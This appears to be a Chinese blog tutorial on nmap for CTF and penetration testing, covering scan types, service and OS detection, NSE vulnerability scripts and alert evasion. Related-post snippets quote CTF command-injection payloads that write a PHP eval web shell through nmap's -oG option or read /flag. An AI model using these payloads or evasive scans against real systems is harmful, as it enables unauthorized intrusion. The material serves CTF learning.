nmap核心使用教程(CTF/攻防实战向)

原创 于 2025-10-24 13:27:40 发布 · 243 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节

nmap是网络扫描和侦察的瑞士军刀,在CTF和攻防演练中至关重要。

一、核心扫描类型

  1. 基础扫描

    nmap <目标IP>

    快速识别在线主机和默认端口。

  2. 端口扫描(-sS/-sT)

    nmap -sS <目标IP> # TCP SYN扫描(隐蔽,默认)

nmap -sT <目标IP> # TCP连接扫描(更可靠)

    SYN扫描速度快、隐蔽,是内网渗透首选。

  3. 服务和版本探测(-sV)

    nmap -sV <目标IP>

    识别开放端口上运行的具体服务及版本号,用于寻找已知漏洞。

  4. 操作系统探测(-O)

    nmap -O <目标IP>

    尝试猜测目标主机的操作系统,为后续攻击提供信息。

二、CTF/实战高级用法

  1. 全面侦察(经典组合)

    nmap -sS -sV -O <目标IP>

    一次性获取端口、服务、系统信息,是信息收集的标准流程。

  2. 全端口扫描(-p-)

    nmap -p- <目标IP>

    扫描所有65535个端口,避免遗漏隐藏服务(如CTF中的非标准端口)。

  3. 脚本引擎(--script)

    nmap --script=vuln <目标IP> # 漏洞扫描

nmap --script=http-title <目标IP> # 获取Web标题

    使用NSE脚本进行漏洞检测、漏洞利用或更深入的信息搜集。

实战提示:

  • 初期:使用-sS -sV快速摸清目标开放的服务。

  • 深入:对Web服务(80/443/8080)进行目录扫描,对数据库端口(3306/5432)尝试弱口令。

  • 隐蔽:在防守严密的网络中使用-sT或调整时序参数(-T)避免触发警报。

掌握nmap是渗透测试成功的第一步。

通过网盘分享的文件:nmap
链接: https://pan.baidu.com/s/1X7Da72Rg30VMbYqbMDFufw?pwd=8880 提取码: 8880 

网络安全的学习之路需要持续的输入和交流。如果你觉得这篇教程有帮助,我的知识星球「网络安全干货精选」或许能为你提供更多价值。直达链接:https://t.zsxq.com/akza7

这里是一个专注于网安干货分享的社群,内容涵盖:

1.CTF解题技巧与工具实战

2.​​红蓝对抗中的工具与战术

3.前沿漏洞分析与利用实践

4.每周精选的高质量安全资讯

期待与你在这个小圈子里相遇,共同交流切磋,快速成长。

臻荣
关注
ctf工具Nmap使用教程图文教程(超详细)
程序员小麦的博客
06-24 1103
kali的命令行中可以直接使用 nmap 命令,打开一个「终端」,输入 nmap 后回车,可以看到 nmap 的版本,证明 nmap 可用。
BUUCTF [网鼎杯 2020 朱雀组] Nmap
Senimo
12-09 5477
BUUCTF [网鼎杯 2020 朱雀组] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
实验四 CTF实践
qq_56472016的博客
12-07 3405
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt
CTF实践 靶机渗透
Radiency的博客
11-23 1987
CTF实践。通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
CTF渗透训练(笔记)
何辰风的博客
12-26 2306
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
CTF实战实践
weixin_46660023的博客
12-05 5860
文章目录前言一、什么是CTF1. CTF竞赛模式2. CTF各大题型简介二、CTF实战1.nmap扫描2. whatweb探测3. Dirb爆破4. wireshark分析5. 利用漏洞提权6. SSH登录服务器总结 前言 今天做了一个CTF的实践,对目标靶机进行了渗透,以此了解CTF实战过程。 一、什么是CTF         首先先来介绍一下CTF。         CTF(Capt.
【黑客工具】之Nmap详细使用教程——扫描器主机、端口、版本、OS、漏洞扫描
weixin_57514792的博客
09-08 874
【黑客工具】之Nmap详细使用教程——扫描器主机、端口、版本、OS、漏洞扫描
精选资源
CTF线下AWD脚本合集.zip
03-31
CTF(Capture The Flag)线下AWD...总的来说,CTF线下AWD脚本合集是一个强大的资源,它为参赛者提供了实战所需的工具,有助于提升比赛表现,同时也提醒我们,在网络攻防的学习和实践中,安全意识和道德规范同样重要。
ctf线下赛mysql密码_CTF线下攻防
weixin_28797919的博客
02-01 559
SSH登陆两三个人进行分工,一个粗略的看下web,有登陆口的话,就需要修改密码,将情况反馈给队友,让登陆ssh的小伙伴进行密码的修改,改成炒鸡复杂、然后将Web目录下载下来,上WAF、文件监控、端口扫描。将这几个工作分工好,顺序就像图上。tips:将下载下来的Web目录理一遍,看是否有可疑的文件夹,比如bak。网络拓扑主机发现如果是在同个C段,或者B段,均可以使用RouterScan进行对80端口...
青海大学网络安全培训及项目管理社团GitHub仓库-网络安全培训资源协作平台-渗透测试靶场搭建教程-常用工具使用指南-CTF竞赛资源-项目管理能力培养-团队协作开发实战-提供DVW.zip
最新发布
10-22
社团的GitHub仓库作为资源分享的重要平台,提供了一系列关于网络安全的培训材料和实战项目,尤其在渗透测试靶场搭建和CTF(Capture The Flag,夺旗赛)竞赛资源方面积累了丰富的资源。 渗透测试靶场搭建是网络安全...
CTF-入门练习题
10-30
题目来自于蓝盾服务器,难度适中,适合于练习,需要wp请留言
BUUCTF WEB NMAP
qq_41696858的博客
12-28 475
经典回显关了的NMAP,和之前做过的一台hack the box靶机里面的某一台比较像 那么就是合理利用 -oN的问题了,直接输出flag就可以,但是你一定要连shell也无所谓,多一步连接工作罢了 127.0.0.1 正常回显,-iL代表查找目标主机中的相关文件 下面就是尝试它如何过滤的 直接输出到flag payload:127.0.0.1' -iL /flag -oN flag ' 怎么说呢,我们在127.0.0.1 | ls的时候他把我们的|转义了,那么肯定是有过滤机制的 其中这两个单引号是用来绕过
CTF学习笔记—Web篇
lt714739295的博客
12-26 1390
代码示例。
CTF-WEB shrine模板注入nmap的基本使用
qq_59350385的博客
07-04 354
[WesternCTF2018]shrineimport flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(',
BUUCTF——Nmap
weixin_71914594的博客
05-17 398
这篇文章描述了在BUUCTF靶场中通过Nmap工具进行渗透测试的过程。作者首先尝试了常规的IP扫描功能,发现无效后转向数据包分析,并尝试伪造XXF头文件。随后,作者尝试命令注入,构造了127.0.0.1 | ls的payload,但发现存在过滤机制。接着,作者尝试上传PHP木马文件,但被过滤,最终通过使用.phtml后缀成功绕过过滤,上传了木马文件。通过蚁剑工具连接后,作者在根目录下找到了flag,成功完成了挑战。整个过程展示了从信息收集到漏洞利用的完整渗透测试流程。
从零开始学CTF(第六期)
2501_90727259的博客
07-03 926
CTF网络攻防基础技能全攻略》摘要:本文系统解析CTF竞赛中的网络基础技能,涵盖四大核心内容:1)TCP/IP协议族及各层协议(HTTP/DNS/SSH等)在CTF中的应用场景;2)实战工具链详解(Wireshark抓包分析、Nmap扫描、漏洞检测工具);3)典型网络攻防技术(SQL注入/XSS/DoS攻击及防御策略);4)实战演练案例(Web渗透、网络攻防对抗)。通过协议原理、工具操作与攻防实战的三维结合,为CTF选手构建完整的网络技能体系,助力赛场夺旗。
一天一道ctf 第34天(NMAP
scrawman的博客
07-16 250
[网鼎杯 2020 朱雀组]Nmap 这题和之前有一道Online Tool很像,都是操纵NMAP。参数-oG会将结果存放到hack.php文件里 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 结果页面回显给我们一个Hacker…,看来是有什么被过滤了。测试下来是php被过滤了,换成标签phtml就可以了(注意两边两个单引号是要的) ' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 3万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.youkuaiyun.com/morrino/article/details/116036237)
网络安全攻防实战的系统化学习
06-18
### 网络安全攻防实战的系统化学习路径及资源推荐 网络安全攻防实战的学习路径可以分为理论基础、技术实践和项目实战三个阶段。以下是针对这三个阶段的详细学习建议和推荐资源。 #### 1. **理论基础(L1)** 在这一阶段,学习者需要掌握网络安全的基础知识,包括但不限于网络协议、操作系统安全、密码学等。这些基础知识是后续深入学习和实践的前提。 - **推荐课程**: - 《计算机网络安全基础》[^1] - 《密码学与信息安全》[^1] - **推荐书籍**: - 《网络安全原理与实践》[^1] - 《密码编码学与网络安全》 #### 2. **技术实践(L2)** 在掌握了基本理论后,学习者可以通过技术文档和工具的使用来提升实际操作能力。此阶段的重点在于熟悉各种攻击技术和防御手段。 - **推荐工具**: - Metasploit:用于渗透测试的框架工具。 - Nmap:网络扫描和主机发现工具。 - Wireshark:网络流量分析工具。 - **推荐学习内容**: - 渗透测试基础[^4] - 常见漏洞利用技术 - 安全防护措施评估[^4] #### 3. **项目实战(L3-L4)** 通过真实的攻防演练和项目实战,学习者可以将理论知识和技术实践应用于实际场景中。此阶段的目标是提升解决复杂问题的能力。 - **推荐实战内容**: - 攻防演练案例分析[^2] - 大型网络攻击模拟[^3] - 红蓝对抗演练[^3] - **推荐平台**: - CTF(Capture The Flag)竞赛平台:如HackTheBox、TryHackMe等。 - 实战演练靶场:如PentesterLab、VulnHub等。 ```python # 示例代码:使用Nmap进行简单的网络扫描 import nmap def scan_network(target): nm = nmap.PortScanner() nm.scan(hosts=target, arguments='-sS -O') for host in nm.all_hosts(): print(f"Host : {host} ({nm[host].hostname()})") print(f"State : {nm[host].state()}") for proto in nm[host].all_protocols(): print(f"----------\nProtocol : {proto}") lport = nm[host][proto].keys() for port in lport: print(f"Port : {port}\tState : {nm[host][proto][port]['state']}") scan_network('192.168.1.0/24') ``` ### 注意事项 - 在进行任何实际操作前,请确保遵守相关法律法规,避免对未经授权的系统进行攻击测试。 - 学习过程中应注重理论与实践相结合,逐步提升自己的综合能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值